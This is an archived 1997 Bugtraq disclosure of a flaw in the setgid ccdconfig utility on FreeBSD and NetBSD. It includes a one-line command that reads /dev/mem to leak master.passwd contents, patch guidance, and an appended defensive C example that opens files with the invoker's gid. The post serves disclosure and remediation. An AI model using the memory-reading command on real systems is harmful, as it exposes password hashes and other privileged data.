Date: Wed, 31 Dec 1997 02:02:31 +0000
From: Niall Smart <rotel@INDIGO.IE>
To: BUGTRAQ@NETSPACE.ORG
Subject: Vulnerability in ccdconfig

Hi,

FreeBSD and NetBSD's ccdconfig doesn't do proper checking of the argument to -f:

    [nsmart@ginseng ~]$ ccdconfig -U -f /dev/mem 2>&1 | strings | grep Charlie
    root:iDeLeTeDiT:0:0::0:0:Charlie: No such file or directory
    ^C

I had to cat /etc/master.passwd in another window to get this to work though :) So perhaps it's not very easily exploitable, but is worth fixing nonetheless.

This bug was also spotted by olivier@secnet.com and fixed in OpenBSD some time ago.

Fixes:

* FreeBSD and NetBSD have been notified of the problem and have fixed it in their source trees as of yesterday (FreeBSD-current, FreeBSD-stable, NetBSD-current). Retrieve the patched ccdconfig.c and compile yourself a new ccdconfig.

* "chmod g-s /sbin/ccdconfig". I can't think of any reason for it to be sgid kmem.

Regards,

Niall

This page is part of Fyodor's exploit world.
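The hardening pattern for the flaw reported above, as an added example that is not part of the original post and is not the FreeBSD/NetBSD patch: a setgid program opens the file named by the user with only the invoker's group rights, and refuses anything that is not a regular file. The helper name open_as_invoker is hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper: open a user-named config file with the invoking
 * user's group rights only. The setgid-granted effective gid (kmem in the
 * report) is set aside for the open and restored afterwards. Returns NULL
 * if the open fails, the path is not a regular file, or a gid switch fails. */
FILE *open_as_invoker(const char *path)
{
    gid_t priv = getegid();
    struct stat st;
    FILE *fp;
    int fd;

    if (setegid(getgid()) != 0)              /* drop to the real gid */
        return NULL;
    /* The access check now uses the real gid; O_NONBLOCK keeps a FIFO or
     * device node from stalling the open before it can be rejected. */
    fd = open(path, O_RDONLY | O_NONBLOCK);
    if (setegid(priv) != 0) {                /* saved set-group-ID permits this */
        if (fd >= 0)
            close(fd);
        return NULL;
    }
    if (fd < 0)
        return NULL;
    /* Defense in depth: a config file is a regular file, never a device. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        (fp = fdopen(fd, "r")) == NULL) {
        close(fd);
        return NULL;
    }
    return fp;
}

int main(int argc, char **argv)
{
    FILE *fp;

    if (argc != 2 || (fp = open_as_invoker(argv[1])) == NULL) {
        /* The message carries no data read from the file. */
        fprintf(stderr, "%s: cannot open config file as invoking user\n", argv[0]);
        return 1;
    }
    fclose(fp);
    return 0;
}
```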